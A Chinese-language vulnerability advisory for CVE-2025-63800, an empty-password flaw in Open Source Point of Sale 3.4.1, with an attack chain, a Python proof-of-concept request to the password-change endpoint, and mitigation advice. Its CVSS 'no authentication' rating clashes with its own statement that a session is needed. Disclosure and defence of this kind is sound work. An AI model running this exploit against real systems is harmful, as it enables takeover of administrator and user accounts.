CVE-2025-63800 CVSS 7.5 高危

CVE-2025-63800 Open Source Point of Sale空密码认证绕过漏洞

披露日期: 2025-11-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-63800

漏洞类型

缺少输入验证/弱密码策略

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open Source Point of Sale

漏洞概述

Open Source Point of Sale 3.4.1版本中存在一个严重的安全漏洞，攻击者可以利用密码更改端点的服务器端验证缺失，将任意用户账户（包括管理员账户）的密码设置为空字符串。当密码被设置为空后，攻击者可以直接使用空密码登录目标账户，从而绕过正常的身份认证机制。该漏洞影响系统的机密性，可能导致未经授权的访问、敏感数据泄露以及管理员权限被劫持。由于该漏洞利用无需特殊权限，且可以通过网络远程触发，因此具有较高的安全风险。

技术细节

漏洞根源在于Open Source Point of Sale的密码更改功能缺少服务器端验证。当已认证用户向密码更改端点发送请求时，如果省略或留空password和repeat_password参数，服务器端代码未进行充分的有效性检查，直接接受空字符串作为新密码。系统在处理请求时，由于缺少对密码字段的非空验证逻辑，允许空密码写入数据库。这种设计缺陷导致用户认证状态被破坏，攻击者可以利用此漏洞将管理员密码设置为空，从而获得管理后台的完全访问权限。攻击者需要先获取一个有效的会话令牌或利用其他方式成为已认证用户，然后发送特制的密码更改请求即可实现攻击。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的有效用户会话（通过社会工程、XSS或其他方式窃取会话cookie）

STEP 2

步骤2

构造特制的密码更改请求，将password和repeat_password参数设置为空字符串

STEP 3

步骤3

向密码更改端点发送POST请求，服务器因缺少验证而接受空密码

STEP 4

步骤4

服务器将目标用户的密码更新为空字符串，并返回成功响应

STEP 5

步骤5

攻击者使用空密码登录目标账户，获得未授权访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-63800 PoC - Open Source Point of Sale Empty Password Vulnerability
# Target: Open Source Point of Sale 3.4.1
# Description: Password change endpoint allows setting empty password

target_url = "http://target.com/opensourcepos"
# Replace with actual session cookie after authentication
session_cookie = {"ci_session": "your_session_cookie_here"}

# Endpoint for password change
password_change_endpoint = f"{target_url}/index.php/login/change_password"

# PoC payload - sending empty password
payload = {
    "password": "",
    "repeat_password": ""
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": f"ci_session={session_cookie['ci_session']}"
}

print("[*] Sending empty password change request...")
response = requests.post(password_change_endpoint, data=payload, headers=headers)

if response.status_code == 200:
    print("[+] Password changed to empty string successfully!")
    print("[+] You can now login with empty password")
else:
    print("[-] Attack failed, check credentials or target URL")

影响范围

Open Source Point of Sale 3.4.1

防御指南

临时缓解措施

在等待官方修复期间，建议采取以下临时缓解措施：1) 监控密码更改日志，检测异常的空密码更改行为；2) 实施Web应用防火墙规则，阻止password参数为空值的请求；3) 强制要求所有用户使用强密码策略；4) 限制密码更改功能的访问频率；5) 定期审计管理员账户的密码状态。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表